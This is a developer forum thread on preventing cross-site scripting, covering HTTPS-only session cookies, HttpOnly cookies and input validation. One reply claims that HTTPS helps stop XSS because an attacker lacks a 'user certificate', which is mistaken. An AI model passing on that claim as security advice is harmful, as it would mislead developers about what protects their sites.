• Post Reply
  • Bookmark Topic Watch Topic
  • New Topic

Preventing XSS

 
Christiaan Thamm
Ranch Hand
Posts: 34
IntelliJ IDE Java
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Is ensuring that the session cookie is sent only on HTTPS Connections a good approach to protecting websites from cross site scripting attacks and why?

My understanding it that the protection mostly resolves around escaping dodgy characters and input validation

Thanks
 
Tapas Chand
Ranch Hand
Posts: 583
8
BSD Java
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Go through this link

It explains in detail what is XSS and how to mitigate the same.
 
Jeanne Boyarsky
author & internet detective
Marshal
Posts: 35279
384
Eclipse IDE Java VI Editor
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Tapas,
Protecting your cookies helps prevent others from intercepting content between when you send the web page to the user and they receive it. It's not for XSS though. It is for preventing a "man in the middle" attack.

You should make your cookie Http Only if possible though. That prevents the bad guys from using XSS to steal the cookie in the first place.
 
Henry Freedman
Greenhorn
Posts: 6
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Jeanne Boyarsky wrote:Tapas,
Protecting your cookies helps prevent others from intercepting content between when you send the web page to the user and they receive it. It's not for XSS though. It is for preventing a "man in the middle" attack.

You should make your cookie Http Only if possible though. That prevents the bad guys from using XSS to steal the cookie in the first place.


Please allow me to point out: no matter what one uses to transfer the cookie (http or https). Once a client side script is invoked, which belongs to a third party (attacking site), it transfers all the cookies it wants and uses them to pretend being a real user, unless they are only valid for one session.

To answer the original question of Christiaan, https is ONE of the factors, which helps preventing XSS during a live session. As the attacking site does not have the user certificate to establish another https with the server, even it has stolen the user's cookie. Yet, https not enough per se, one needs to validate user input with special care not to allow formulating a script call in the returned response, which can take advantage of those sites the user visits, and offer cookies which live longer than a session.
 
Jeanne Boyarsky
author & internet detective
Marshal
Posts: 35279
384
Eclipse IDE Java VI Editor
  • Mark post as helpful
  • send pies
  • Quote
  • Report post to moderator
Henry Freedman wrote:Once a client side script is invoked, which belongs to a third party (attacking site), it transfers all the cookies it wants and uses them to pretend being a real user, unless they are only valid for one session.

The point of Http Only is that a client side script can't access it though.
 
  • Post Reply
  • Bookmark Topic Watch Topic
  • New Topic